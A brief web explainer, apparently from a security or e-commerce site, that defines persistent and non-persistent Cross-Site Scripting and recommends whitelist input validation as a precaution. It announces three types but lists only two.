Cross-Site Scripting (XSS) attacks are stated as one of the most rampant occurring yet easily fixable injection attack faced by e-commerce businesses and a variety of other web applications.
An XSS attack is of 3 types:
- Persistent XSS Attack: Caused when payload is stored on server side and gets retrieved when there is a user request to a page
- Non-Persistent XSS Attack: Caused when payload is reflected back to the user by opening a link to a vulnerable website with a crafted input.
Precautions to Mitigate XSS Attacks
- Input ValidationTo prevent XSS, white-list most input to alphanumeric or in some cases, special characters. This will reduce surface attack and minimize the potential for bugs.
More detailed steps can be found here.